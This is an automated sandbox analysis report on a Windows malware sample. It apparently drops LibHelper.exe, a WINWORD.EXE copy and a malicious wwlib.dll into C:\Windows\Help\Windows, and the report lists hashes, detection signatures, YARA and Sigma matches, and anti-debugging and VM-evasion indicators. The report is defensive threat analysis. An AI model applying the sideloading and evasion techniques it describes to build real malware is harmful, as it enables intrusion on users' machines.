Loading ...

Play interactive tourEdit tour

Analysis Report 9nZ3r5ZN45

Overview

General Information

Sample Name:9nZ3r5ZN45 (renamed file extension from none to exe)
Analysis ID:377823
MD5:910fe72c4f1bd5a451561f732d94a8b8
SHA1:a93ebdd16c5862b178d6e5c58d3e074df772a021
SHA256:6beb4a5bcbdaf33f697eea6a4f7f2e9704cc88c20c265d0ce42287d930d06345
Infos:

Most interesting Screenshot:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Contains functionality to detect sleep reduction / modifications
Drops executables to the windows directory (C:\Windows) and starts them
Injects files into Windows application
Sigma detected: Executables Started in Suspicious Folder
Antivirus or Machine Learning detection for unpacked file
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
File is packed with WinRar
Found potential string decryption / allocating functions
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Starts Microsoft Word (often done to prevent that the user detects that something wrong)
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • 9nZ3r5ZN45.exe (PID: 6004 cmdline: 'C:\Users\user\Desktop\9nZ3r5ZN45.exe' MD5: 910FE72C4F1BD5A451561F732D94A8B8)
    • LibHelper.exe (PID: 6076 cmdline: 'C:\Windows\Help\Windows\LibHelper.exe' MD5: 813B19969C3B67C6BB1369433142021A)
    • WINWORD.EXE (PID: 5572 cmdline: 'C:\Windows\Help\Windows\WINWORD.EXE' MD5: 15E52F52ED2B8ED122FAE897119687C4)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Windows\Help\Windows\wwlib.dllSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
  • 0x53890:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0

Sigma Overview

System Summary:

barindex
Sigma detected: Executables Started in Suspicious FolderShow sources
Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\Help\Windows\LibHelper.exe' , CommandLine: 'C:\Windows\Help\Windows\LibHelper.exe' , CommandLine|base64offset|contains: , Image: C:\Windows\Help\Windows\LibHelper.exe, NewProcessName: C:\Windows\Help\Windows\LibHelper.exe, OriginalFileName: C:\Windows\Help\Windows\LibHelper.exe, ParentCommandLine: 'C:\Users\user\Desktop\9nZ3r5ZN45.exe' , ParentImage: C:\Users\user\Desktop\9nZ3r5ZN45.exe, ParentProcessId: 6004, ProcessCommandLine: 'C:\Windows\Help\Windows\LibHelper.exe' , ProcessId: 6076

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus detection for dropped fileShow sources
Source: C:\Windows\Help\Windows\wwlib.dllAvira: detection malicious, Label: TR/Crypt.XPACK.Gen2
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Windows\Help\Windows\LibHelper.exeReversingLabs: Detection: 16%
Source: C:\Windows\Help\Windows\wwlib.dllReversingLabs: Detection: 16%
Multi AV Scanner detection for submitted fileShow sources
Source: 9nZ3r5ZN45.exeVirustotal: Detection: 50%Perma Link
Source: 9nZ3r5ZN45.exeReversingLabs: Detection: 25%
Source: 2.2.WINWORD.EXE.6d860000.3.unpackAvira: Label: TR/Crypt.XPACK.Gen2
Source: 9nZ3r5ZN45.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Windows\Help\Windows\WINWORD.EXEFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9415_none_508df7e2bcbccb90\MSVCR90.dllJump to behavior
Source: 9nZ3r5ZN45.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 9nZ3r5ZN45.exe
Source: Binary string: t:\word\x86\ship\0\winword.pdb6\ship\0\winword.exe\bbtopt\winwordO.pdb source: WINWORD.EXE, 00000002.00000002.462834723.000000002FF11000.00000020.00020000.sdmp, WINWORD.EXE.0.dr
Source: Binary string: 6\ship\0\winword.exe\bbtopt\winwordO.pdb source: WINWORD.EXE, WINWORD.EXE.0.dr
Source: Binary string: t:\word\x86\ship\0\winword.pdb source: WINWORD.EXE, WINWORD.EXE.0.dr
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeCode function: 0_2_0083A383 FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0083A383
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeCode function: 0_2_0084B014 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0084B014
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeCode function: 0_2_0085A02E FindFirstFileExA,0_2_0085A02E
Source: C:\Windows\Help\Windows\LibHelper.exeCode function: 1_2_01075746 FindFirstFileExW,1_2_01075746
Source: C:\Windows\Help\Windows\WINWORD.EXECode function: 2_2_6D868875 FindFirstFileExW,2_2_6D868875
Source: C:\Windows\Help\Windows\WINWORD.EXECode function: 2_2_03039CCD FindFirstFileExW,2_2_03039CCD
Source: WINWORD.EXE, 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmpString found in binary or memory: http://%s%08x.txtc:
Source: WINWORD.EXE, 00000002.00000002.462222699.000000000164A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary:

barindex
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeCode function: 0_2_008370B9: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_008370B9
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeFile created: C:\Windows\Help\Windows\__tmp_rar_sfx_access_check_5689109Jump to behavior
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeFile deleted: C:\Windows\Help\Windows\__tmp_rar_sfx_access_check_5689109Jump to behavior
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeCode function: 0_2_008462E00_2_008462E0
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeCode function: 0_2_008384580_2_00838458
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeCode function: 0_2_0085C1000_2_0085C100
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeCode function: 0_2_008501130_2_00850113
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeCode function: 0_2_0083320E0_2_0083320E
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeCode function: 0_2_0084F3CA0_2_0084F3CA
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeCode function: 0_2_008434460_2_00843446
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeCode function: 0_2_0085C5AE0_2_0085C5AE
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeCode function: 0_2_0083F5FB0_2_0083F5FB
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeCode function: 0_2_0083E5460_2_0083E546
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeCode function: 0_2_008505480_2_00850548
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeCode function: 0_2_008606A40_2_008606A4
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeCode function: 0_2_008436C10_2_008436C1
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeCode function: 0_2_008467150_2_00846715
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeCode function: 0_2_0083277D0_2_0083277D
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeCode function: 0_2_0084F8C60_2_0084F8C6
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeCode function: 0_2_0083E9A90_2_0083E9A9
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeCode function: 0_2_008439F20_2_008439F2
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeCode function: 0_2_008459110_2_00845911
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeCode function: 0_2_0083DB110_2_0083DB11
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeCode function: 0_2_0083BB6E0_2_0083BB6E
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeCode function: 0_2_0084FCDE0_2_0084FCDE
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeCode function: 0_2_00853D1A0_2_00853D1A
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeCode function: 0_2_00846D4E0_2_00846D4E
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeCode function: 0_2_00835EAB0_2_00835EAB
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeCode function: 0_2_00833FBD0_2_00833FBD
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeCode function: 0_2_0083DF480_2_0083DF48
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeCode function: 0_2_00853F490_2_00853F49
Source: C:\Windows\Help\Windows\LibHelper.exeCode function: 1_2_0107B4DD1_2_0107B4DD
Source: C:\Windows\Help\Windows\WINWORD.EXECode function: 2_2_6D86E6012_2_6D86E601
Source: C:\Windows\Help\Windows\WINWORD.EXECode function: 2_2_03058BD02_2_03058BD0
Source: C:\Windows\Help\Windows\WINWORD.EXECode function: 2_2_0303F81C2_2_0303F81C
Source: C:\Windows\Help\Windows\WINWORD.EXECode function: 2_2_0303C0D02_2_0303C0D0
Source: C:\Windows\Help\Windows\WINWORD.EXECode function: 2_2_0306F6312_2_0306F631
Source: C:\Windows\Help\Windows\WINWORD.EXECode function: 2_2_0303F6FC2_2_0303F6FC
Source: C:\Windows\Help\Windows\WINWORD.EXECode function: 2_2_0303C5682_2_0303C568
Source: C:\Windows\Help\Windows\WINWORD.EXECode function: 2_2_030415A02_2_030415A0
Source: C:\Windows\Help\Windows\WINWORD.EXECode function: 2_2_030314062_2_03031406
Source: C:\Windows\Help\Windows\WINWORD.EXECode function: 2_2_030354BB2_2_030354BB
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeCode function: String function: 0084E2F0 appears 31 times
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeCode function: String function: 0084D8C4 appears 38 times
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeCode function: String function: 0084D9C0 appears 51 times
Source: 9nZ3r5ZN45.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 9nZ3r5ZN45.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: LibHelper.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: LibHelper.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: LibHelper.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: LibHelper.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 9nZ3r5ZN45.exe, 00000000.00000003.198404389.0000000000666000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamewlib.dll2 vs 9nZ3r5ZN45.exe
Source: 9nZ3r5ZN45.exe, 00000000.00000002.203395406.0000000004AF0000.00000002.00000001.sdmpBinary or memory string: originalfilename vs 9nZ3r5ZN45.exe
Source: 9nZ3r5ZN45.exe, 00000000.00000002.203395406.0000000004AF0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs 9nZ3r5ZN45.exe
Source: 9nZ3r5ZN45.exe, 00000000.00000002.203238414.00000000049F0000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs 9nZ3r5ZN45.exe
Source: 9nZ3r5ZN45.exe, 00000000.00000002.202920472.00000000026C0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs 9nZ3r5ZN45.exe
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeSection loaded: dxgidebug.dllJump to behavior
Source: 9nZ3r5ZN45.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Windows\Help\Windows\wwlib.dll, type: DROPPEDMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-03-09
Source: classification engineClassification label: mal80.evad.winEXE@5/3@0/0
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeCode function: 0_2_00836E20 GetLastError,FormatMessageW,0_2_00836E20
Source: C:\Windows\Help\Windows\WINWORD.EXECode function: RegOpenKeyExA,RegGetValueA,RegSetValueExA,OpenSCManagerA,GetLastError,CloseHandle,FindCloseChangeNotification,CloseHandle,CreateServiceA,ChangeServiceConfig2A,RegOpenKeyExA,RegCreateKeyA,RegSetValueExA,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,2_2_0303107D
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeCode function: 0_2_008496AD FindResourceW,DeleteObject,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_008496AD
Source: C:\Windows\Help\Windows\WINWORD.EXECode function: 2_2_0303107D RegOpenKeyExA,RegGetValueA,RegSetValueExA,OpenSCManagerA,GetLastError,CloseHandle,FindCloseChangeNotification,CloseHandle,CreateServiceA,ChangeServiceConfig2A,RegOpenKeyExA,RegCreateKeyA,RegSetValueExA,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,2_2_0303107D
Source: C:\Windows\Help\Windows\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\edgDDEA.tmpJump to behavior
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeCommand line argument: sfxname0_2_0084CC0E
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeCommand line argument: sfxstime0_2_0084CC0E
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeCommand line argument: STARTDLG0_2_0084CC0E
Source: C:\Windows\Help\Windows\LibHelper.exeCommand line argument: PcHelper1_2_010710A0
Source: C:\Windows\Help\Windows\LibHelper.exeCommand line argument: PCHELPER1_2_010710A0
Source: C:\Windows\Help\Windows\LibHelper.exeCommand line argument: @Cw1_2_010710A0
Source: C:\Windows\Help\Windows\LibHelper.exeCommand line argument: PCHELPER1_2_010710A0
Source: C:\Windows\Help\Windows\LibHelper.exeCommand line argument: PcHelper1_2_010710A0
Source: C:\Windows\Help\Windows\LibHelper.exeCommand line argument: PCHELPER1_2_010710A0
Source: C:\Windows\Help\Windows\WINWORD.EXECommand line argument: wwlib.dll2_2_2FF1159F
Source: C:\Windows\Help\Windows\WINWORD.EXECommand line argument: FMain2_2_2FF1159F
Source: 9nZ3r5ZN45.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeFile read: C:\Windows\win.iniJump to behavior
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: 9nZ3r5ZN45.exeVirustotal: Detection: 50%
Source: 9nZ3r5ZN45.exeReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeFile read: C:\Users\user\Desktop\9nZ3r5ZN45.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\9nZ3r5ZN45.exe 'C:\Users\user\Desktop\9nZ3r5ZN45.exe'
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeProcess created: C:\Windows\Help\Windows\LibHelper.exe 'C:\Windows\Help\Windows\LibHelper.exe'
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeProcess created: C:\Windows\Help\Windows\WINWORD.EXE 'C:\Windows\Help\Windows\WINWORD.EXE'
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeProcess created: C:\Windows\Help\Windows\LibHelper.exe 'C:\Windows\Help\Windows\LibHelper.exe' Jump to behavior
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeProcess created: C:\Windows\Help\Windows\WINWORD.EXE 'C:\Windows\Help\Windows\WINWORD.EXE' Jump to behavior
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
Source: C:\Windows\Help\Windows\WINWORD.EXEFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9415_none_508df7e2bcbccb90\MSVCR90.dllJump to behavior
Source: 9nZ3r5ZN45.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 9nZ3r5ZN45.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 9nZ3r5ZN45.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 9nZ3r5ZN45.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 9nZ3r5ZN45.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 9nZ3r5ZN45.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 9nZ3r5ZN45.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: 9nZ3r5ZN45.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 9nZ3r5ZN45.exe
Source: Binary string: t:\word\x86\ship\0\winword.pdb6\ship\0\winword.exe\bbtopt\winwordO.pdb source: WINWORD.EXE, 00000002.00000002.462834723.000000002FF11000.00000020.00020000.sdmp, WINWORD.EXE.0.dr
Source: Binary string: 6\ship\0\winword.exe\bbtopt\winwordO.pdb source: WINWORD.EXE, WINWORD.EXE.0.dr
Source: Binary string: t:\word\x86\ship\0\winword.pdb source: WINWORD.EXE, WINWORD.EXE.0.dr
Source: 9nZ3r5ZN45.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 9nZ3r5ZN45.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 9nZ3r5ZN45.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 9nZ3r5ZN45.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 9nZ3r5ZN45.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeFile created: C:\Windows\Help\Windows\__tmp_rar_sfx_access_check_5689109Jump to behavior
Source: wwlib.dll.0.drStatic PE information: section name: .detourc
Source: wwlib.dll.0.drStatic PE information: section name: .detourd
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeCode function: 0_2_0084E336 push ecx; ret 0_2_0084E349
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeCode function: 0_2_0084D8C4 push eax; ret 0_2_0084D8E2
Source: C:\Windows\Help\Windows\LibHelper.exeCode function: 1_2_01071F24 push ecx; ret 1_2_01071F36
Source: C:\Windows\Help\Windows\WINWORD.EXECode function: 2_2_2FF1153C push ecx; ret 2_2_2FF1154F
Source: C:\Windows\Help\Windows\WINWORD.EXECode function: 2_2_6D864F04 push ecx; ret 2_2_6D864F16
Source: C:\Windows\Help\Windows\WINWORD.EXECode function: 2_2_0305931B push ecx; ret 2_2_03059319
Source: C:\Windows\Help\Windows\WINWORD.EXECode function: 2_2_03032E74 push ecx; ret 2_2_03032E86

Persistence and Installation Behavior:

barindex
Drops executables to the windows directory (C:\Windows) and starts themShow sources
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeExecutable created and started: C:\Windows\Help\Windows\LibHelper.exeJump to behavior
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeExecutable created and started: C:\Windows\Help\Windows\WINWORD.EXEJump to behavior
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeFile created: C:\Windows\Help\Windows\wwlib.dllJump to dropped file
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeFile created: C:\Windows\Help\Windows\LibHelper.exeJump to dropped file
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeFile created: C:\Windows\Help\Windows\WINWORD.EXEJump to dropped file
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeFile created: C:\Windows\Help\Windows\wwlib.dllJump to dropped file
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeFile created: C:\Windows\Help\Windows\LibHelper.exeJump to dropped file
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeFile created: C:\Windows\Help\Windows\WINWORD.EXEJump to dropped file
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeProcess created: C:\Windows\Help\Windows\WINWORD.EXE
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeProcess created: C:\Windows\Help\Windows\WINWORD.EXEJump to behavior
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Help\Windows\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Contains functionality to detect sleep reduction / modificationsShow sources
Source: C:\Windows\Help\Windows\WINWORD.EXECode function: 2_2_6D8613512_2_6D861351
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
Source: C:\Windows\Help\Windows\WINWORD.EXECode function: 2_2_03062842 rdtsc 2_2_03062842
Source: C:\Windows\Help\Windows\WINWORD.EXECode function: 2_2_6D8613512_2_6D861351
Source: C:\Windows\Help\Windows\LibHelper.exe TID: 4660Thread sleep time: -260000s >= -30000sJump to behavior
Source: C:\Windows\Help\Windows\WINWORD.EXE TID: 5560Thread sleep count: 111 > 30Jump to behavior
Source: C:\Windows\Help\Windows\WINWORD.EXE TID: 5560Thread sleep time: -111000s >= -30000sJump to behavior
Source: C:\Windows\Help\Windows\WINWORD.EXELast function: Thread delayed
Source: C:\Windows\Help\Windows\WINWORD.EXELast function: Thread delayed
